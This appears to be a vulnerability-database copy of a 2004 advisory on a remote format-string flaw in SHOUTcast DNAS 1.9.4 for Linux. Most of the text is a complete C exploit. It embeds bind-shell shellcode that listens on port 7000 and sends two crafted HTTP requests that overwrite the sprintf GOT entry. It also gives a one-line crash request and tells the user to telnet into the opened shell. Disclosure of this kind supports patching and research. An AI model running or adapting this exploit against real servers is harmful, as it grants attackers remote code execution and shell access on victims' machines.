Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:7439
HistoryDec 24, 2004 - 12:00 a.m.

SHOUTcast remote format string vulnerability

2004-12-2400:00:00
vulners.com
15
JSON

Product: SHOUTcast v1.9.4 (and older?)
Vendor: http://www.shoutcast.com
Vuln: Remote format string
BugFinder: Tomasz Trojanowski (onestep)
Author: Damian Put <[email protected]> www.CC-Team.org
Date: Dec 23, 2004

  1. BACKGROUND

"SHOUTcast is Nullsoft's Free Winamp-based distributed streaming audio
system. Thousands of broadcasters around the world are waiting for you to
tune in and listen"

  1. DESCRIPTION

Remote exploitation of a format string vulnerability could allow execution
of arbitrary code.

A part of request, which was sent by attacker to server, would be included
in second arg of sprintf() function (0x0804adc3 in linux binary). It is
obviously not good from a security viewpoint. We can crash SHOUTcast in a
very easy way, using following request:

http://host:8000/content/&#37;n.mp3

Or reach remote shell thanks to attached exploit`s code.

  1. CREDIT

Special thanks:
Tomasz Trojanowski for information about vulnerability

  1. EXPLOIT

/* SHOUTcast DNAS/Linux v1.9.4 format string remote exploit /
/ Damian Put <[email protected]> Cyber-Crime Team (www.CC-Team.org) /
/ Tested on slackware 9.1 and 10.0 (0xbf3feee0) /
/ When exploit only crash SHOUTcast we should calculate new address: /
/ /
/ bash-2.05b$ gdb sc_serv core /
//
/ (gdb) x/x $edi /
/ 0xbe462270: 0x78257825 /
/ (gdb) x/x 0xbe462270-996 /
/ 0xbe461e8c: 0x5050c031 /
/ /
/ 0xbe461e8c - This is our shellcode addr /
/ /
/ Now we "only" must change format string code in req2 :-) */

#include <stdio.h>
#include <stdlib.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/* Default SHOUTcast port */
#define PORT 8000

char shellcode[] = //bindshellcode (port 7000)
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char *argv[])
{
int sock;
char *host;
struct hostent *h;
struct sockaddr_in dest;

  char req1[1024] = &quot;GET /content/AA&quot;
  /* sprintf GOT addr */
  &quot;&#92;x3c&#92;x49&#92;x06&#92;x08&#92;x3d&#92;x49&#92;x06&#92;x08&#92;x3e&#92;x49&#92;x06&#92;x08&#92;x3f&#92;x49&#92;x06&#92;x08&quot;;
  
  strcat&#40;req1, shellcode&#41;;
  strcat&#40;req1, &quot;.mp3 HTTP/1.0&#92;r&#92;n&#92;r&#92;n&quot;&#41;;
  
  /* We cannot use &#37;numberx and &#37;number$n &#40;filtered&#41; */
  /* 0xbf3feee0 -  shellcode addr on slackware 9.1   */
  char *req2 = &quot;GET /content/&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&#37;x&quot;
  &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;
  &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-&#37;n-AAAAAAAAAAAA-&#37;n-AAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;
  &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-&#37;n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;
  &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-&#37;n.mp3&quot;
  &quot; HTTP/1.0&#92;r&#92;n&#92;r&#92;n&quot;;
  
  
  printf&#40;&quot;SHOUTcast DNAS/Linux v1.9.4 format string remote exploit by pucik www.CC-Team.org&#92;n&quot;&#41;;
  if&#40;argc &lt; 2&#41;
  {
        printf&#40;&quot;Usage: &#37;s &lt;host&gt;&#92;n&quot;, argv[0]&#41;;
        exit&#40;0&#41;;
  }
  
  host = argv[1];
  
  if&#40;!&#40;h = gethostbyname&#40;host&#41;&#41;&#41;
  {
        fprintf&#40;stderr, &quot;Cannot get IP of &#37;s, &#37;s!&#92;n&quot;, host, strerror&#40;errno&#41;&#41;;
        exit&#40;-1&#41;;
  }

  sock = socket&#40;PF_INET, SOCK_STREAM, 0&#41;;
  
  dest.sin_addr=*&#40;&#40;struct in_addr*&#41;h-&gt;h_addr&#41;;
  dest.sin_family = PF_INET;
  dest.sin_port = htons&#40;PORT&#41;;
  
  if&#40;connect&#40;sock, &#40;struct sockaddr*&#41;&dest, sizeof&#40;struct sockaddr&#41;&#41; == -1&#41;
  {
        fprintf&#40;stderr, &quot;Cannot connect to &#37;s, &#37;s!&#92;n&quot;, host, strerror&#40;errno&#41;&#41;;
        exit&#40;-1&#41;;
  }
  
  printf&#40;&quot;[*] Sending first request ...&#92;n&quot;&#41;;
  write&#40;sock, req1, strlen&#40;req1&#41;&#41;;
  
  close&#40;sock&#41;;
  
  sock = socket&#40;PF_INET, SOCK_STREAM, 0&#41;;
  
  if&#40;connect&#40;sock, &#40;struct sockaddr*&#41;&dest, sizeof&#40;struct sockaddr&#41;&#41; == -1&#41;
  {
        fprintf&#40;stderr, &quot;Cannot connect to &#37;s, &#37;s!&#92;n&quot;, host, strerror&#40;errno&#41;&#41;;
        exit&#40;-1&#41;;
  }
  
  printf&#40;&quot;[*] Sending second request ...&#92;n&quot;&#41;;
  write&#40;sock, req2, strlen&#40;req2&#41;&#41;;

  close&#40;sock&#41;;
  
  printf&#40;&quot;[*] Try telnet &#37;s 7000 :&#41;&#92;n&quot;, host&#41;;
  
  return 0;

}

JSON